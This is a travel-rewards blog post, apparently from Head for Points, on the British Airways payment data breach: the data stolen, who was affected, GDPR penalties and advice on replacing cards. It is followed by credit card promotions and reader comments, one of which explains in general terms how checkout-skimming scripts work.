Maximise your Avios, air miles and hotel points

What more do we know about the British Airways data breach?

Links on Head for Points may support the site by paying a commission.  See here for all partner links.

Friday was one of those occasional crazy days for us.  Whenever British Airways is leading the news agenda we are normally sucked along in the tailwind, whether we like it or not.  Thanks to everyone who shared their experiences and suggestions via our comments.

I popped up in the Daily Telegraph (see here), The Guardian and Daily Express and I did a segment for talkRADIO.  I was even invited on Good Morning Britain but unfortunately (or not) the invite arrived after I had gone to bed on Thursday.

What did we actually learn though?

The key revelation yesterday was the sheer breadth of data that was stolen.

British Airways BA 777X 777 9X

We know that 380,000 bookings were compromised.  These were made between 22:58 on 21st August and 21:45 on 5th September.  For all of those bookings, the hackers have your:

  • email address
  • postal address
  • credit card number
  • expiration date
  • CVV

…. according to Alex Cruz on Radio 4.  The CVV data gives a clue to how this happened.  Companies are not allowed to store CVV numbers.  This means that the data was stolen on the journey from the BA IT system to BA’s payment processing company.

Who was impacted?

It still isn’t clear.  British Airways has said that only bookers at ba.com and via the mobile app were affected.

However, various reports in our comments and elsewhere suggest that people who have booked via telephone and with BA Holidays are receiving emails saying their details are compromised.  People who have only had money REFUNDED are also reporting getting the email.  It is probably best to assume that any transaction you’ve made which led to a BA credit card charge or refund is likely to be at risk.

Am I at risk if I didn’t make a booking?

No.  Any stored cards you have at ba.com were not compromised.

No passport or flight data was stolen either, as this is not passed to the payment processing company.

Whilst ba.com now says “The personal and financial details of customers making or changing bookings on ba.com and the airline’s mobile app were compromised.”, my reading of this is that you only have issues if you made a change which incurred a change fee.  Paying the change fee will have exposed your card details.

Will BA be fined for this?

Almost certainly, under the new GDPR regime which came into force this year.  It is likely to be the first major penalty enforced since those rules were adopted.  It will be interesting to see what level it is set at, given that the cap is 4% of BA’s (huge) turnover.

IAG’s share price fell 3.6% yesterday morning as investors worries about compensation payments and the impact on future bookings but had recovered to a 1.35% fall by the end of the day.  The overall market was only down 0.55%.

Talking of the new regulations …..

This, from the ICO website, is what the Information Commissioners Office says a company has to tell its customers when it discovers a breachBritish Airways did not comply with this in its original email to those who were impacted, which is why it had to send a 2nd email last night.  These are the rules:

“You need to describe, in clear and plain language, the nature of the personal data breach and, at least:

  • the name and contact details of your data protection officer (if your organisation has one) or other contact point where more information can be obtained;
  • a description of the likely consequences of the personal data breach; and
  • a description of the measures taken, or proposed to be taken, to deal with the personal data breach and including, where appropriate, of the measures taken to mitigate any possible adverse effects.”

Should I pro-actively cancel my credit card?

There is no evidence yet of any card fraud linked to this breach.

This in itself is odd.  Why go to all the trouble of stealing this data if you are not going to cash in on it?

American Express has decided to do nothing.  If you want full peace of mind, I recommend reporting your card as ‘lost’ via the website which will trigger a new one.  Monzo, Starling, Virgin Money and Tesco Bank, amongst others have said that any card which was used for a BA transaction will automatically be replaced.

If you want to know more …..

There is a dedicated British Airways web page with more information which you can find here.


How to earn Avios from UK credit cards

How to earn Avios from UK credit cards (June 2024)

As a reminder, there are various ways of earning Avios points from UK credit cards.  Many cards also have generous sign-up bonuses!

In February 2022, Barclaycard launched two exciting new Barclaycard Avios Mastercard cards with a bonus of up to 25,000 Avios. You can apply here.

You qualify for the bonus on these cards even if you have a British Airways American Express card:

Barclaycard Avios Plus card

Barclaycard Avios Plus Mastercard

Get 25,000 Avios for signing up and an upgrade voucher at £10,000 Read our full review

Barclaycard Avios card

Barclaycard Avios Mastercard

5,000 Avios for signing up and an upgrade voucher at £20,000 Read our full review

There are two official British Airways American Express cards with attractive sign-up bonuses:

British Airways American Express Premium Plus

25,000 Avios and the famous annual 2-4-1 voucher Read our full review

British Airways American Express

5,000 Avios for signing up and an Economy 2-4-1 voucher for spending £15,000 Read our full review

You can also get generous sign-up bonuses by applying for American Express cards which earn Membership Rewards points. These points convert at 1:1 into Avios.

American Express Preferred Rewards Gold

Your best beginner’s card – 30,000 points (TO 16TH JULY), FREE for a year & four airport ….. Read our full review

The Platinum Card from American Express

40,000 bonus points and a huge range of valuable benefits – for a fee Read our full review

Run your own business?

We recommend Capital on Tap for limited companies. You earn 1 Avios per £1 which is impressive for a Visa card, along with a sign-up bonus worth 10,500 Avios.

Capital on Tap Business Rewards Visa

10,000 points bonus – plus an extra 500 points for our readers Read our full review

There are also generous bonuses on the two American Express Business cards, with the points converting at 1:1 into Avios. These cards are open to sole traders as well as limited companies.

American Express Business Platinum

40,000 points sign-up bonus and an annual £200 Amex Travel credit Read our full review

American Express Business Gold

20,000 points sign-up bonus and FREE for a year Read our full review

Click here to read our detailed summary of all UK credit cards which earn Avios. This includes both personal and small business cards.

Comments (105)

This article is closed to new comments. Feel free to ask your question in the HfP forums.

  • Terry S says:

    I booked flights on BA website using my BA Amex during those dates – this was the response I received from Amex yesterday;
    ‘There is no action you need to take – we will contact you immediately if there’s any unusual activity with your Account. In the meantime you can continue to use your Card as normal’

    So far no unusual payments on my account. As Rob says it’s odd they don’t appear to have taken money from anyone……

  • Roger1* says:

    Further to Paul’s comment (08:48) about Cruz,

    I saw and heard Cruz several times on BBC radio and TV, Channel 4/ITN and LBC yesterday. He badly needs to go back to his media training course, repeat and learn.

    He made the point that in over 20 years, ba.com had not suffered a breach as bad as this. OK, and the point is what, exactly?

    The behaviour was ‘criminal’. Good to know.

    ‘It’s not our fault.’ He didn’t say that, but it is what he was trying to imply.

    He said he ‘sympathized’. I feel so much better now that I know this.

    This can’t be blamed on poor English. His English was very good, of course. More likely, he was less than fully briefed and jumped in in front of the cameras and microphones without fully thinking.

    He gave the wrong image. He didn’t look at all in charge. Sorry, As a damage limitation exercise, it failed.

    • Leon Foster-Hill says:

      He simply has to go, his race to the bottom and lack of investment in what is needed to run our premier ariline.

  • anon says:

    To all those interested in how other similar data breaches work.

    1 – the hacker obtains access to the template/skin files, or a database field that outputs HTML directly in to the template

    2 – the hacker adds a section of javascript which sends the contents of all desired form elements (so, perhaps anything within a form with the ID of #checkout) off to some third party URL immediately prior to submission. Most often the javascript is actually stored in a file on a third party URL (again, obfuscated to blend in as well as possible).

    3 – (normally) the hacker collects the details as they are passively submitted to third party URLs, and sells them as quickly as possible on the dark web (normally).

    In essence – the data isn’t intercepted *during* the submission to the processor; it is sent by the victim’s browser at exactly the same time (separately). You hit ‘Pay’ or ‘Submit’ (or whatever) and the payment button on your browser does what the javascript tells it to do, before going on to do what it is supposed to do.

    This is why they will have CVVs even though they are never stored.

    The fact that point 3 hasn’t happened makes me believe that this isn’t one of ‘normal’ Russian hackers but perhaps somebody working within.

    • Graham Walsh says:

      That is exactly my thinking, the attack came from inside, so uploaded modified code to the payment processing page. Now surely they have an audit trail of everyone who commits a change to the website pages/templates. It would require a login. Unless they all shared a login to the site, then it could have been anyone with the details.

      • Lili says:

        If they keep audit trail (as they should) and you have to login, I can’t imagine anybody being THAT stupid. It would be like leaving not just a murder weapon with all your fingerprints on it, but a business card on top.
        Then again, as you say, might be that there is shared login, or other loophole to change the code. Can’t say I’d be surprised.
        Shame we will probably never know the root cause. Whenever something goes so spectacularly wrong there’s usually a couple of things coinciding.

  • delbert says:

    Surely there’s potential for a compensation claim under GDPR Article 82 for material or non-material damage caused by this breach.

    How one goes about this is the interesting bit. Can anyone elaborate?

    • Russ says:

      I wouldn’t get technical or creative if one’s experience of Compliance is limited. There should be a template letter for GDPR breaches somewhere. Stick to that like glue. If not keep it as teflon as possible i.e. Dear [insert name ?!?] I am in receipt of your correspondence dated blah blah blah the contents of which have been noted. Then give them your proposed ex gracia figure. Resist the urge to fill a blank piece of paper.

      • delbert says:

        Good point and well noted, Russ.

        As I posted on HfP last night I received a double whammy yesterday. I woke up to an email from BA yesterday morning informing that my data was compromised which originated from a rewards flight booked last Sunday. Then I get home from work last night to find a letter in my letterbox from another company informing me that my data was compromised last March.

        I’m going after both these companies with the same template and will see where I get but I’m not letting up as this is my private data that they’re playing with.

        • Shoestring says:

          All good except you haven’t suffered any damage, have you?

        • delbert says:

          Go read Article 82 GDPR, Shoestring. Material and non-material damage are covered.

        • Shoestring says:

          So what damage have you suffered? To your dignity? Having to change a credit card? Worry?

          You won’t get anywhere with that.

        • delbert says:

          My personal information is now out there, Shoestring. BA have admitted the fact. What is your point?

        • Shoestring says:

          that you haven’t suffered any damages whatsoever, so can’t claim compensation for damages

        • Slamb says:

          Hi
          Can I ask what template you are using? I made a booking with Ba in this time. It’s happened before with American Express & they paid financial compensation without even asking?

    • Nicky says:

      You are correct re s82 GDPR but in reality after paying a fine for the initial breach which may run into the millions, surely if they then had to pay compensation to those who could actually prove they were targeted and lost money – this would bankrupt the airline: that is why I believe they are covering their butts by claiming they will compensate any losses suffered by individuals

  • John D says:

    Call me cynical but I don’t think the motivation was to steal and misuse customers’ payment details. If it were, we would have seen evidence of a greater rate of fradulent transactions on the affected cards weeks’ ago. That hasn’t happened.

    I think whoever did this had another agenda: to cause reputational and economic damage to IAG. Whether that is someone on the inside or external may become apparent once further audit has taken place but given the nature of what’s happened, whoever was responsible must have been aware of the security vulnerabilities as this is a unique form of data security compromise which has been executed at an enormous scale.

    And I don’t think customers need to worry too much once affected cards have been replaced as all the remaining data are address/e-mail address which, by themselves, all you can do is spam people.

    • shd says:

      You don’t need to postulate outsiders causing “reputational and economic damage to IAG”, they have demonstrated over and over again they are quite capable of inflicting it by themselves!

      • FlyUpTop says:

        Havnt seen this comment yet, will the latest fine added onto the last one result in some type of claw back from redemption values.

        • shd says:

          H4P posted months(?) ago that BA management have already signed-off on an Exec Club Avios devaluation, it’s just a matter of getting it implemented. Something to do with those pesky IT systems…

        • Doug M says:

          Perhaps also waiting for a period of time clear from any large cock-ups, before delivering more bad news.

        • shd says:

          Why would IAG need to wait to devalue BA Exec Club?

          BA has such a stranglehold on the market they don’t need to worry what their frequent fliers think, many business pax are locked in via corporate deals anyway.

  • Nick says:

    I must give it to Amex. Unlike other corporates, such as BA/IAG, they are proactively advising, and keeping their customers up to date, with the BA issue. If you go online to your Amex account(s) there is a “pop up” with advice and links.

    Good on them!

    IMHO, shame on the usual self-serving, smug, BA/IAG management!

    • Shoestring says:

      Yes, indeed.

      Hats off to Amex.

      They are doing what they always do at no extra cost and probably dissuaded a lot of over-worried morons from requesting new cards when they didn’t need to.

  • Choons says:

    Now that they have the email addresses, I wonder how many have the top 10 most common passwords. I would bet quite a few.

    123456
    password
    12345678
    qwerty, were the top four last year, to save people looking it up.

    • AndyR says:

      Most email providers don’t allow you to have those passwords, has to be a combinaton of letters, numbers, uppercase/lowercase, special characters etc.

    • S says:

      Zero sympathy for people who have that poor of a opsec standard.

      For them it’s always been just a matter of time. Personally, I don’t trust anything unless it comes with a 2 factor authentication.

  • Talay says:

    This already exists.

    Where we have integrated card payments into our EPoS then Verifone provide a token whereby we never know the details of the cards.

    But what is needed is a system on a Visa / Mastercard global level.

This article is closed to new comments. Feel free to ask your question in the HfP forums.

The UK's biggest frequent flyer website uses cookies, which you can block via your browser settings. Continuing implies your consent to this policy. Our privacy policy is here.